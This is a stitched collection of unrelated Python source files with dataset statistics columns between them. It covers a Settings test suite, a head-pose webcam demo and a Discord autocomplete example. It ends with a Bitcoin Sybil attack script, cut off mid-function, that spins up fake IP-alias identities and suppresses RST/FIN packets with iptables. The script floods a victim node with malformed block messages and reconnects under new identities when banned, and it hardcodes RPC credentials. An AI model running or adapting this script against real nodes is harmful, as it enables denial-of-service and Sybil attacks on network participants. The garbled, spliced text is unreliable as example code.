default_factories={
"key1": lambda: "value1",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
del settings["key1"]
del settings["key2"]
assert "key1" not in settings
assert "key2" not in settings
assert settings["key1"] == "value1"
with pytest.raises(KeyError):
settings["key2"]
def test_default_settings() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == "value3"
del settings["key3"]
assert settings["key3"] == "value3"
settings.reset("key3")
assert settings["key3"] == []
settings["key3"] = "something"
assert settings["key3"] == "something"
settings.reset_all()
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == []
def test_load_without_file() -> None:
def sample_prompt_function(settings: Settings) -> Settings:
# s = input("Enter the settings: ")
return settings.update({"key1": "a", "key2": "b"})
settings = Settings(
settings_file_path="not a real file.yaml",
prompt_user_for_all_settings=sample_prompt_function,
default_factories={
"key1": lambda: "value1",
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
"key4": "value4",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == "value3"
settings.load(fallback_option="prompt user")
assert settings["key1"] == "a"
assert settings["key2"] == "b"
assert settings["key3"] == "value3"
with pytest.raises(KeyError):
settings["key4"]
settings.load(fallback_option="default settings")
assert settings["key1"] == "a"
assert settings["key2"] == "b"
assert settings["key3"] == "value3"
assert settings["key4"] == "value4"
settings.clear()
settings.load(fallback_option="default settings")
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == []
assert settings["key4"] == "value4"
with pytest.raises(ValueError):
settings.load(fallback_option="invalid option")
def test_load_after_empty() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
prompt_user_for_all_settings=lambda: 1 / 0,
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.clear()
assert settings["key1"] == "value1"
def test_prompt() -> None:
def sample_prompt_function() -> Any:
# s = input("Enter a setting: ")
return "a"
settings = Settings(
settings_file_path="sample settings file name.json",
prompt_user_for_all_settings=lambda: {"key1": "a", "key2": "b"},
default_factories={
"key1": sample_prompt_function,
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
settings.prompt("key1")
assert settings["key1"] == "a"
def test_changing_settings_before_load() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.load(fallback_option="default settings")
assert settings["key1"] == "hello"
settings["key1"] = "a"
settings.load(fallback_option="default settings")
assert settings["key1"] == "a"
def test_update() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.update({"key1": "a"})
assert settings["key1"] == "a"
settings.update({"key2": "b"})
assert settings["key2"] == "b"
def test_Settings__is_using_json() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_factories={
"key1": lambda: "value1",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings._Settings__is_using_json()
settings.settings_file_path = "sample_settings_file_name.yaml"
assert not settings._Settings__is_using_json()
def test_load_from_dict() -> None:
settings = Settings()
settings.load_from_dict(
{
"key1": "hello",
"key2": "world",
}
)
assert len(settings.data) == 0
settings = Settings(
data={
"key1": "a",
"key2": "b",
}
)
settings.load_from_dict(
{
"key1": "c",
"key2": "d",
}
)
assert settings.data["key1"] == "c"
assert settings.data["key2"] == "d"
def test_dump_to_dict() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
data={
"key1": "hello",
"key2": "world",
},
)
assert settings.dump_to_dict() == {
"key1": "hello",
"key2": "world",
}
def test_nested_Settings() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_settings={
"key6": [],
"key7": Settings(
data={
"key8": "value8",
}
),
},
data={
"key1": "hello",
"key2": "world",
"key3": "value3",
"key4": Settings(
settings_file_path="why would anyone want an inner file though.yaml",
data={
"key5": "value5",
},
),
},
)
assert settings.dump_to_dict() == {
"key1": "hello",
"key2": "world",
"key3": "value3",
"key4": {
"key5": "value5",
},
}
def test_creating_setting_after_init() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_settings={
"key1": [],
"key2": "value2",
},
)
with pytest.raises(KeyError):
settings["key3"] = "value3"
def test_prompt_error() -> None:
settings = Settings(
settings_file_path="nonexistent file.json",
default_settings={
"key1": [],
"key2": "value2",
},
)
with pytest.raises(ValueError):
settings.load(fallback_option="prompt user")
def test_nested_setting_loaders_and_dumpers() -> None:
@dataclass
class Coords:
x: int
y: int
def __init__(self, x_and_y: Tuple[int, int]) -> None:
self.x = x_and_y[0]
self.y = x_and_y[1]
settings = Settings(
setting_loader=Coords,
setting_dumper=lambda obj: (obj.x, obj.y),
data={
"location 1": Coords(x_and_y=(1, 2)),
"location 2": Coords(x_and_y=(3, 4)),
"patterns": Settings(
setting_loader=re.compile,
setting_dumper=lambda x: x.pattern,
data={
"phone number pattern": re.compile(r"\d{3}-?\d{3}-?\d{4}"),
"email address pattern": re.compile(
r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
),
},
),
},
)
settings_dict = settings.dump_to_dict()
assert settings_dict["location 1"] == (1, 2)
assert settings_dict["location 2"] == (3, 4)
assert settings_dict["patterns"]["phone number pattern"] == r"\d{3}-?\d{3}-?\d{4}"
assert (
settings_dict["patterns"]["email address pattern"]
== r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
)
settings.load_from_dict(settings_dict)
assert settings["location 1"] == Coords(x_and_y=(1, 2))
assert settings["location 2"] == Coords(x_and_y=(3, 4))
assert settings["patterns"]["phone number pattern"] == re.compile(
r"\d{3}-?\d{3}-?\d{4}"
)
assert settings["patterns"]["email address pattern"] == re.compile(
r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
)
def test_init_without_keywords() -> None:
with pytest.raises(TypeError):
Settings("sample settings file path.json")
| 27.84507
| 86
| 0.527466
| 996
| 9,885
| 5.048193
| 0.128514
| 0.136436
| 0.060859
| 0.066826
| 0.65354
| 0.565434
| 0.542562
| 0.520286
| 0.471559
| 0.43218
| 0
| 0.026588
| 0.315124
| 9,885
| 354
| 87
| 27.923729
| 0.7161
| 0.006474
| 0
| 0.512579
| 0
| 0
| 0.185781
| 0.029741
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.056604
| false
| 0
| 0.015723
| 0.006289
| 0.08805
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c5b696f9bc64bbbc8bda141e564e9a8de0891a8
| 5,910
|
py
|
Python
|
demo/demo_FSANET_ssd.py
|
jacke121/FSA-Net
|
c4d60bd38e9d17b0ea33d824ec443a01bdeba015
|
[
"Apache-2.0"
] | null | null | null |
demo/demo_FSANET_ssd.py
|
jacke121/FSA-Net
|
c4d60bd38e9d17b0ea33d824ec443a01bdeba015
|
[
"Apache-2.0"
] | null | null | null |
demo/demo_FSANET_ssd.py
|
jacke121/FSA-Net
|
c4d60bd38e9d17b0ea33d824ec443a01bdeba015
|
[
"Apache-2.0"
] | null | null | null |
import os
import time
import cv2
import sys
sys.path.append('..')
import numpy as np
from math import cos, sin
from lib.FSANET_model import *
import numpy as np
from keras.layers import Average
def draw_axis(img, yaw, pitch, roll, tdx=None, tdy=None, size = 50):
print(yaw,roll,pitch)
pitch = pitch * np.pi / 180
yaw = -(yaw * np.pi / 180)
roll = roll * np.pi / 180
if tdx != None and tdy != None:
tdx = tdx
tdy = tdy
else:
height, width = img.shape[:2]
tdx = width / 2
tdy = height / 2
# X-Axis pointing to right. drawn in red
x1 = size * (cos(yaw) * cos(roll)) + tdx
y1 = size * (cos(pitch) * sin(roll) + cos(roll) * sin(pitch) * sin(yaw)) + tdy
# Y-Axis | drawn in green
# v
x2 = size * (-cos(yaw) * sin(roll)) + tdx
y2 = size * (cos(pitch) * cos(roll) - sin(pitch) * sin(yaw) * sin(roll)) + tdy
# Z-Axis (out of the screen) drawn in blue
x3 = size * (sin(yaw)) + tdx
y3 = size * (-cos(yaw) * sin(pitch)) + tdy
cv2.line(img, (int(tdx), int(tdy)), (int(x1),int(y1)),(0,0,255),3)
cv2.line(img, (int(tdx), int(tdy)), (int(x2),int(y2)),(0,255,0),3)
cv2.line(img, (int(tdx), int(tdy)), (int(x3),int(y3)),(255,0,0),2)
return img
def draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model):
# loop over the detections
if detected.shape[2]>0:
for i in range(0, detected.shape[2]):
# extract the confidence (i.e., probability) associated with the
# prediction
confidence = detected[0, 0, i, 2]
# filter out weak detections
if confidence > 0.5:
# compute the (x, y)-coordinates of the bounding box for
# the face and extract the face ROI
(h0, w0) = input_img.shape[:2]
box = detected[0, 0, i, 3:7] * np.array([w0, h0, w0, h0])
(startX, startY, endX, endY) = box.astype("int")
# print((startX, startY, endX, endY))
x1 = startX
y1 = startY
w = endX - startX
h = endY - startY
x2 = x1+w
y2 = y1+h
xw1 = max(int(x1 - ad * w), 0)
yw1 = max(int(y1 - ad * h), 0)
xw2 = min(int(x2 + ad * w), img_w - 1)
yw2 = min(int(y2 + ad * h), img_h - 1)
cv2.rectangle(input_img, (xw1,yw1), (xw2,yw2), (0, 0, 255), 2)
start=time.time()
faces[i,:,:,:] = cv2.resize(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], (img_size, img_size))
faces[i,:,:,:] = cv2.normalize(faces[i,:,:,:], None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)
face = np.expand_dims(faces[i,:,:,:], axis=0)
p_result = model.predict(face)
print('fangxiang',time.time()-start)
face = face.squeeze()
img = draw_axis(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], p_result[0][0], p_result[0][1], p_result[0][2])
input_img[yw1:yw2 + 1, xw1:xw2 + 1, :] = img
return input_img
def main():
os.makedirs('./img',exist_ok=True)
img_size = 64
img_idx = 0
ad = 0.6
#Parameters
num_capsule = 3
dim_capsule = 16
routings = 2
stage_num = [3,3,3]
lambda_d = 1
num_classes = 3
image_size = 64
num_primcaps = 7*3
m_dim = 5
S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
model1 = FSA_net_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
model2 = FSA_net_Var_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
num_primcaps = 8*8*3
S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
model3 = FSA_net_noS_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
weight_file1 = '../pre-trained/300W_LP_models/fsanet_capsule_3_16_2_21_5/fsanet_capsule_3_16_2_21_5.h5'
model1.load_weights(weight_file1)
print('Finished loading model 1.')
weight_file2 = '../pre-trained/300W_LP_models/fsanet_var_capsule_3_16_2_21_5/fsanet_var_capsule_3_16_2_21_5.h5'
weight_file3 = '../pre-trained/300W_LP_models/fsanet_noS_capsule_3_16_2_192_5/fsanet_noS_capsule_3_16_2_192_5.h5'
model2.load_weights(weight_file2)
print('Finished loading model 2.')
model3.load_weights(weight_file3)
print('Finished loading model 3.')
inputs = Input(shape=(64,64,3))
x1 = model1(inputs) #1x1
x2 = model2(inputs) #var
x3 = model3(inputs) #w/o
avg_model = Average()([x1,x2,x3])
model = Model(inputs=inputs, outputs=avg_model)
# load our serialized face detector from disk
print("[INFO] loading face detector...")
protoPath = os.path.sep.join(["face_detector", "deploy.prototxt"])
modelPath = os.path.sep.join(["face_detector",
"res10_300x300_ssd_iter_140000.caffemodel"])
net = cv2.dnn.readNetFromCaffe(protoPath, modelPath)
# capture video
cap = cv2.VideoCapture(0)
# cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1024*1)
# cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 768*1)
while True:
# get video frame
ret, input_img = cap.read()
img_idx = img_idx + 1
img_h, img_w, _ = np.shape(input_img)
blob = cv2.dnn.blobFromImage(cv2.resize(input_img, (300, 300)), 1.0,
(300, 300), (104.0, 177.0, 123.0))
net.setInput(blob)
detected = net.forward()
faces = np.empty((detected.shape[2], img_size, img_size, 3))
input_img = draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model)
# cv2.imwrite('img/'+str(img_idx)+'.png',input_img)
cv2.imshow("result", input_img)
key = cv2.waitKey(1)
if __name__ == '__main__':
main()
| 34.16185
| 122
| 0.577496
| 879
| 5,910
| 3.691695
| 0.261661
| 0.034515
| 0.01849
| 0.020339
| 0.267488
| 0.255778
| 0.194145
| 0.180586
| 0.137134
| 0.105701
| 0
| 0.070907
| 0.281726
| 5,910
| 172
| 123
| 34.360465
| 0.693522
| 0.099831
| 0
| 0.034483
| 0
| 0
| 0.09362
| 0.059645
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025862
| false
| 0
| 0.077586
| 0
| 0.12069
| 0.051724
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c5b93a68b2014eb34642b9dabeaf09a9053d01e
| 5,118
|
py
|
Python
|
examples/app_commands/slash_autocomplete.py
|
Mihitoko/pycord
|
137c1474eed5fb4273e542bd22ad76764a8712fc
|
[
"MIT"
] | null | null | null |
examples/app_commands/slash_autocomplete.py
|
Mihitoko/pycord
|
137c1474eed5fb4273e542bd22ad76764a8712fc
|
[
"MIT"
] | null | null | null |
examples/app_commands/slash_autocomplete.py
|
Mihitoko/pycord
|
137c1474eed5fb4273e542bd22ad76764a8712fc
|
[
"MIT"
] | 1
|
2022-02-20T09:10:40.000Z
|
2022-02-20T09:10:40.000Z
|
import discord
from discord.commands import option
bot = discord.Bot(debug_guilds=[...])
COLORS = ["red", "orange", "yellow", "green", "blue", "indigo", "violet"]
LOTS_OF_COLORS = [
"aliceblue",
"antiquewhite",
"aqua",
"aquamarine",
"azure",
"beige",
"bisque",
"blueviolet",
"brown",
"burlywood",
"cadetblue",
"cornflowerblue",
"cornsilk",
"crimson",
"cyan",
"darkblue",
"deepskyblue",
"dimgray",
"dimgrey",
"dodgerblue",
"firebrick",
"floralwhite",
"forestgreen",
"fuchsia",
"gainsboro",
"ghostwhite",
"gold",
"goldenrod",
"gray",
"green",
"greenyellow",
"grey",
"honeydew",
"hotpink",
"indianred",
"indigo",
"ivory",
"khaki",
"lavender",
"lavenderblush",
"lawngreen",
"lightcoral",
"maroon",
"mediumaquamarine",
"mediumblue",
"mediumorchid",
"midnightblue",
"navajowhite",
"navy",
"oldlace",
"olive",
"olivedrab",
"orange",
"orangered",
"orchid",
"palegoldenrod",
"palegreen",
"plum",
"powderblue",
"purple",
"red",
"rosybrown",
"royalblue",
"saddlebrown",
"sienna",
"springgreen",
"steelblue",
"tan",
"teal",
"thistle",
"tomato",
"turquoise",
"violet",
"wheat",
"white",
"whitesmoke",
"yellow",
"yellowgreen",
]
BASIC_ALLOWED = [...] # This would normally be a list of discord user IDs for the purpose of this example
async def color_searcher(ctx: discord.AutocompleteContext):
"""
Returns a list of matching colors from the LOTS_OF_COLORS list.
In this example, we've added logic to only display any results in the
returned list if the user's ID exists in the BASIC_ALLOWED list.
This is to demonstrate passing a callback in the discord.utils.basic_autocomplete function.
"""
return [color for color in LOTS_OF_COLORS if ctx.interaction.user.id in BASIC_ALLOWED]
async def get_colors(ctx: discord.AutocompleteContext):
"""Returns a list of colors that begin with the characters entered so far."""
return [color for color in COLORS if color.startswith(ctx.value.lower())]
async def get_animals(ctx: discord.AutocompleteContext):
"""Returns a list of animals that are (mostly) the color selected for the "color" option."""
picked_color = ctx.options["color"]
if picked_color == "red":
return ["cardinal", "ladybug"]
elif picked_color == "orange":
return ["clownfish", "tiger"]
elif picked_color == "yellow":
return ["goldfinch", "banana slug"]
elif picked_color == "green":
return ["tree frog", "python"]
elif picked_color == "blue":
return ["blue jay", "blue whale"]
elif picked_color == "indigo":
return ["eastern indigo snake"] # Needs to return an iterable even if only one item
elif picked_color == "violet":
return ["purple emperor butterfly", "orchid dottyback"]
else:
return ["rainbowfish"]
@bot.slash_command(name="ac_example")
@option("color", description="Pick a color!", autocomplete=get_colors)
@option("animal", description="Pick an animal!", autocomplete=get_animals)
async def autocomplete_example(
ctx: discord.ApplicationContext,
color: str,
animal: str,
):
"""
Demonstrates using ctx.options to create options
that are dependent on the values of other options.
For the `color` option, a callback is passed, where additional
logic can be added to determine which values are returned.
For the `animal` option, the callback uses the input
from the color option to return an iterable of animals
"""
await ctx.respond(f"You picked {color} for the color, which allowed you to choose {animal} for the animal.")
@bot.slash_command(name="ac_basic_example")
@option(
"color",
description="Pick a color from this big list!",
autocomplete=discord.utils.basic_autocomplete(color_searcher),
# Demonstrates passing a callback to discord.utils.basic_autocomplete
)
@option(
"animal",
description="Pick an animal from this small list",
autocomplete=discord.utils.basic_autocomplete(["snail", "python", "cricket", "orca"]),
# Demonstrates passing a static iterable discord.utils.basic_autocomplete
)
async def autocomplete_basic_example(
ctx: discord.ApplicationContext,
color: str,
animal: str,
):
"""
This demonstrates using the discord.utils.basic_autocomplete helper function.
For the `color` option, a callback is passed, where additional
logic can be added to determine which values are returned.
For the `animal` option, a static iterable is passed.
While a small amount of values for `animal` are used in this example,
iterables of any length can be passed to discord.utils.basic_autocomplete
Note that the basic_autocomplete function itself will still only return a maximum of 25 items.
"""
await ctx.respond(f"You picked {color} as your color, and {animal} as your animal!")
bot.run("TOKEN")
| 27.079365
| 112
| 0.657679
| 604
| 5,118
| 5.506623
| 0.384106
| 0.033073
| 0.035779
| 0.061034
| 0.291942
| 0.228803
| 0.180698
| 0.100421
| 0.069152
| 0.069152
| 0
| 0.000503
| 0.223329
| 5,118
| 188
| 113
| 27.223404
| 0.836226
| 0.05295
| 0
| 0.074627
| 0
| 0.007463
| 0.338261
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.014925
| 0
| 0.089552
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c5bad7796ac5e7201e5d6fb5312abee3b503a5c
| 11,522
|
py
|
Python
|
tools/Networking/sybil_block_no_ban.py
|
simewu/bitcoin_researcher
|
b9fd2efdb8ae8467c5bd4b3320713a541635df16
|
[
"MIT"
] | 1
|
2020-02-15T21:44:04.000Z
|
2020-02-15T21:44:04.000Z
|
tools/Networking/sybil_block_no_ban.py
|
SimeoW/bitcoin
|
3644405f06c8b16a437513e8c02f0f061b91be2e
|
[
"MIT"
] | null | null | null |
tools/Networking/sybil_block_no_ban.py
|
SimeoW/bitcoin
|
3644405f06c8b16a437513e8c02f0f061b91be2e
|
[
"MIT"
] | null | null | null |
from _thread import start_new_thread
from bitcoin.messages import *
from bitcoin.net import CAddress
from bitcoin.core import CBlock
from io import BytesIO as _BytesIO
import atexit
import bitcoin
import fcntl
import hashlib
import json
import os
import random
import re
import socket
import struct
import sys
import time
import datetime
if os.geteuid() != 0:
sys.exit("\nYou need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.\n")
# Specify the attacker's genuine IP
attacker_ip = input('\nEnter attacker\'s IP address: ')
# Specify the victim's IP, and port (8333 for Bitcoin)
victim_ip = input('Enter victim\'s IP address: ')
victim_port = 8333
# How many identities should run simultaneously
num_identities = 8
# While attacking the victim, wait this many seconds before sending each version message
seconds_between_version_packets = 0.1
identity_interface = [] # Keeps the IP alias interface and IP for each successful connection
identity_address = [] # Keeps the IP and port for each successful connection
identity_socket = [] # Keeps the socket for each successful connection
# The file where the iptables backup is saved, then restored when the script ends
iptables_file_path = f'{os.path.abspath(os.getcwd())}/backup.iptables.rules'
# Send commands to the Linux terminal
def terminal(cmd):
return os.popen(cmd).read()
# Send commands to the Bitcoin Core Console
def bitcoin(cmd):
return os.popen('./../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=kZIdeN4HjZ3fp9Lge4iezt0eJrbjSi8kuSuOHeUkEUbQVdf09JZXAAGwF3R5R2qQkPgoLloW91yTFuufo7CYxM2VPT7A5lYeTrodcLWWzMMwIrOKu7ZNiwkrKOQ95KGW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 ' + cmd).read()
# Generate a random identity using the broadcast address template
def random_ip():
# By forcing the IP to be above a certain threshhold, it prevents a lot of errors
minimum_ip_range = min(int(attacker_ip.split('.')[-1]), int(victim_ip.split('.')[-1])) + 1
while(True):
ip = broadcast_address
old_ip = ''
while(old_ip != ip):
old_ip = ip
ip = ip.replace('255', str(random.randint(minimum_ip_range, 255)), 1)
# Don't accept already assigned IPs
if ip == default_gateway: continue
if ip == victim_ip: continue
if ip not in [x[0] for x in identity_address]: break
return ip
#return f'10.0.{str(random.randint(0, 255))}.{str(random.randint(0, 255))}'
# Checking the internet by sending a single ping to Google
#def internet_is_active():
# return os.system('ping -c 1 google.com') == 0
# If all else fails, we can use this to recover the network
#def reset_network():
# print('Resetting network...')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} down')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} up')
# Create an alias for a specified identity
def ip_alias(ip_address):
global alias_num
print(f'Setting up IP alias {ip_address} on {network_interface}')
interface = f'{network_interface}:{alias_num}'
terminal(f'sudo ifconfig {interface} {ip_address} netmask 255.255.255.0 broadcast {broadcast_address} up')
alias_num += 1
return interface
# Construct a block packet using python-bitcoinlib
def block_packet_bytes():
hashPrevBlock = bytearray(random.getrandbits(8) for _ in range(32))
hashMerkleRoot = bytearray(random.getrandbits(8) for _ in range(32))
nTime = int((datetime.datetime.now() - datetime.datetime(1970, 1, 1)).total_seconds())#.to_bytes(8, 'little')
nNonce = random.getrandbits(32)
msg = CBlock(
nVersion=bitcoin_protocolversion,
hashPrevBlock=hashPrevBlock,
#hashPrevBlock='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
hashMerkleRoot=hashMerkleRoot,
#hashMerkleRoot='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
nTime=nTime,
nBits=0,
nNonce=nNonce,
vtx=()
)
name = 'block'
f = _BytesIO()
msg.stream_serialize(f)
body = f.getvalue()
res = b'\xf9\xbe\xb4\xd9'
res += name.encode()
res += b"\x00" * (12 - len(name))
res += struct.pack(b"<I", len(body))
#th = hashlib.sha256(body).digest() # add checksum
#h = hashlib.sha256(th).digest()
#res += h[:4]
res += bytearray(random.getrandbits(8) for _ in range(4))
res += body
return res
# Construct a version packet using python-bitcoinlib
def version_packet(src_ip, dst_ip, src_port, dst_port):
msg = msg_version(bitcoin_protocolversion)
msg.nVersion = bitcoin_protocolversion
msg.addrFrom.ip = src_ip
msg.addrFrom.port = src_port
msg.addrTo.ip = dst_ip
msg.addrTo.port = dst_port
# Default is /python-bitcoinlib:0.11.0/
msg.strSubVer = bitcoin_subversion.encode() # Look like a normal node
return msg
# Close a connection
def close_connection(socket, ip, port, interface):
socket.close()
terminal(f'sudo ifconfig {interface} {ip} down')
if socket in identity_socket: identity_socket.remove(socket)
else: del socket
if interface in identity_interface: identity_interface.remove(interface)
if (ip, port) in identity_address: identity_address.remove((ip, port))
print(f'Successfully closed connection to ({ip} : {port})')
# Creates a fake connection to the victim
def make_fake_connection(src_ip, dst_ip, verbose=True):
src_port = random.randint(1024, 65535)
dst_port = victim_port
print(f'Creating fake identity ({src_ip} : {src_port}) to connect to ({dst_ip} : {dst_port})...')
interface = ip_alias(src_ip)
identity_interface.append(interface)
if verbose: print(f'Successfully set up IP alias on interface {interface}')
if verbose: print('Resulting ifconfig interface:')
if verbose: print(terminal(f'ifconfig {interface}').rstrip() + '\n')
if verbose: print('Setting up iptables configurations')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST -j DROP')
if verbose: print('Creating network socket...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if verbose: print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
while success == -1:
print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
time.sleep(1)
print(network_interface)
if verbose: print(f'Binding socket to ({src_ip} : {src_port})...')
s.bind((src_ip, src_port))
if verbose: print(f'Connecting ({src_ip} : {src_port}) to ({dst_ip} : {dst_port})...')
try:
s.connect((dst_ip, dst_port))
except:
close_connection(s, src_ip, src_port, interface)
make_fake_connection(random_ip(), dst_ip, False)
return
# Send version packet
version = version_packet(src_ip, dst_ip, src_port, dst_port)
s.send(version.to_bytes())
# Get verack packet
verack = s.recv(1924)
# Send verack packet
verack = msg_verack(bitcoin_protocolversion)
s.send(verack.to_bytes())
# Get verack packet
verack = s.recv(1024)
if verbose: print('Connection successful!')
identity_address.append((src_ip, src_port))
identity_socket.append(s)
# Listen to the connections for future packets
if verbose: print('Attaching attacker script {interface}')
try:
start_new_thread(attack, (), {
'socket': s,
'src_ip': src_ip,
'src_port': src_port,
'dst_ip': dst_ip,
'dst_port': dst_port,
'interface': interface
})
except:
print('Error: unable to start thread to sniff interface {interface}')
# Send version repeatedly, until banned
def attack(socket, src_ip, src_port, dst_ip, dst_port, interface):
block = block_packet_bytes()
while True:
if seconds_between_version_packets != 0:
time.sleep(seconds_between_version_packets)
try:
socket.send(block)
except Exception as e:
print(e)
break
close_connection(socket, src_ip, src_port, interface)
print(f'Peer was banned ({src_ip} : {src_port})')
make_fake_connection(random_ip(), dst_ip, False)
# Initialize the network
def initialize_network_info():
print('Retrieving network info...')
global default_gateway, network_interface, broadcast_address
# Get the network interface of the default gateway
m = re.search(r'default +via +([^ ]+) +dev +([^ ]+)', terminal('ip route'))
if m != None:
default_gateway = m.group(1).strip()
network_interface = m.group(2).strip()
else:
print('Error: Network interface couldn\'t be found.')
sys.exit()
# Get the broadcast address of the network interface
# Used as an IP template of what can change, so that packets still come back to the sender
m = re.search(r'broadcast ([^ ]+)', terminal(f'ifconfig {network_interface}'))
if m != None:
broadcast_address = m.group(1).strip()
else:
print('Error: Network broadcast IP couldn\'t be found.')
sys.exit()
# Initialize Bitcoin info
def initialize_bitcoin_info():
print('Retrieving bitcoin info...')
global bitcoin_subversion
global bitcoin_protocolversion
bitcoin_subversion = '/Satoshi:0.18.0/'
bitcoin_protocolversion = 70015
try:
network_info = None #json.loads(bitcoin('getnetworkinfo'))
if 'subversion' in network_info:
bitcoin_subversion = network_info['subversion']
if 'protocolversion' in network_info:
bitcoin_protocolversion = network_info['protocolversion']
except:
pass
# Save a backyp of the iptable rules
def backup_iptables():
terminal(f'iptables-save > {iptables_file_path}')
# Restore the backup of the iptable rules
def cleanup_iptables():
if(os.path.exists(iptables_file_path)):
print('Cleaning up iptables configuration')
terminal(f'iptables-restore < {iptables_file_path}')
os.remove(iptables_file_path)
# Remove all ip aliases that were created by the script
def cleanup_ipaliases():
for i in range(0, len(identity_address)):
try:
ip = identity_address[i][0]
interface = identity_interface[i]
print(f'Cleaning up IP alias {ip} on {interface}')
terminal(f'sudo ifconfig {interface} {ip} down')
except: pass
# This function is ran when the script is stopped
def on_close():
print('Closing open sockets')
for socket in identity_socket:
socket.close()
cleanup_ipaliases()
cleanup_iptables()
print('Cleanup complete. Goodbye.')
#print('Verifying that internet works...')
#if not internet_is_active():
# reset_network()
# This is the first code to run
if __name__ == '__main__':
global alias_num
alias_num = 0 # Increments each alias
initialize_network_info()
initialize_bitcoin_info()
atexit.register(on_close) # Make on_close() run when the script terminates
cleanup_iptables() # Restore any pre-existing iptables before backing up, just in case if the computer shutdown without restoring
backup_iptables()
# Create the connections
for i in range(1, num_identities + 1):
try:
make_fake_connection(src_ip = random_ip(), dst_ip = victim_ip)
except ConnectionRefusedError:
